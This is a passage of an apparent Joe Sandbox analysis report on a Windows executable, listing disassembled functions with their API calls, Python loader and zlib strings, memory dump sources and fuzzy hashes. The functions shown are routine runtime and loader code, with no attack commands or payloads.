                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16217A76A087968AEB258F68C4807FC33A4FB44719F44463AD76D86EE5DF38D584CB40
                                                                                                                                                                                                                                              Function 00007FF6B7515F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: 1ed75aa72f50d236d9686b0a6e597cd7aba8c1c411a2243c41135f4c077dd308
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5116023E1C66282EA61AF19940027EA264BF85B85F444536FB8CD7FB6DF3DE4418700
                                                                                                                                                                                                                                              Function 00007FF6B7526354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: be48282a8cd2cc7da7c5f69b13c750ed32804945e68f4a7ac804d1c504c0b065
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3218433A1CA4586EB618F1CD48037976A0FB94B54F244234EB9EC7AE9DF3CD4118B00
                                                                                                                                                                                                                                              Function 00007FF6B75103BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: a84ba4a718ccd5eed1345ccf01100c65a9825216815a7ae7e20535eea5ef0b15
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D901C422E0C76580EA04DF5A99410B9A691BF85FE1F484631EF5C97FE6CE7CE4028300
                                                                                                                                                                                                                                              Function 00007FF6B751D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF6B7510C90,?,?,?,00007FF6B75122FA,?,?,?,?,?,00007FF6B7513AE9), ref: 00007FF6B751D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction ID: 03153f43d82c1e21f5ae14c97fc931c40e7c8e65b3e43365fdf77f0453d9abc4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06F0F892F0DB9645FE645F79584167512905F847A2F080734DF2EC6AE2EE2CA880A610

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FF6B7505830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505840
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505852
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505889
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750589B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058B4
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058C6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058DF
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058F1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750590D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750591F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750593B
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750594D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505969
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750597B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505997
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059A9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059C5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059D7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction ID: 51059412cc8c27bda031adb8049a171a26fb45d4a4ab3af1fd8e4184feb329f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2022C367A0DB0792FB56DB5DA824AB423B0FF04789F645039CB5E822B1FF3CB5589244
                                                                                                                                                                                                                                              Function 00007FF6B75240AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                              • Instruction ID: 0390bb774afaf5aadfddf8d483c2a622e12849082b212feeda2442df2b802f7d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86B29D73E1C2928BE7658F68D440BFD77A1FB54388F505135DB0A9BAA8DF38B9018B40
                                                                                                                                                                                                                                              Function 00007FF6B750ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                                              • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                              • Instruction ID: 1a4b141c3d6f157c2cb759e1018874ba5d70d119d35f8856e0809f4cb67f553a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD52B373A1C6A64BE7A48F18D498B7E3BAAFB44344F054139E78A87790DF39D944CB40
                                                                                                                                                                                                                                              Function 00007FF6B750D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction ID: a34d1c2bd872d6ac2a92cb46ed2bb1fcc56650d32559f5c199ae5cbcbeb2ab7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4231FA73609B8586EB609F64E8807AE6374FB84748F44403ADB4E87BA9EF79D548C710
                                                                                                                                                                                                                                              Function 00007FF6B7525C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525C45
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A909
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                              • Instruction ID: 95f0c04069e4de3d30322c73e55e1f1e83f292b0eeba1eaea1bfc8591df2b883
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1D1AE37F1C25286E7209F2AD8811B96761EF84794F448136EB4EC7AB5EF3CE8518740
                                                                                                                                                                                                                                              Function 00007FF6B751A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction ID: 6b311e013661d88019044c8d22ac4984071de2e1b38d022f686d164072ab9c7d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52313D3761CB8186DB608F29E8402AE73A4FB88758F540139EB9D83BA5EF38D555CB00
                                                                                                                                                                                                                                              Function 00007FF6B7521874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                              • Instruction ID: e0dc1134c1ede4e01cd5a65e05e741f536f6f00a3cfd438340bcb22d5fea85c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CB1B423B1C69241EA61DF2A99002BA63A1EF44BE4F545131EF5D9BBE5EF3CE841C300
                                                                                                                                                                                                                                              Function 00007FF6B7525E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EAA
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EBB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525ECC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255DC
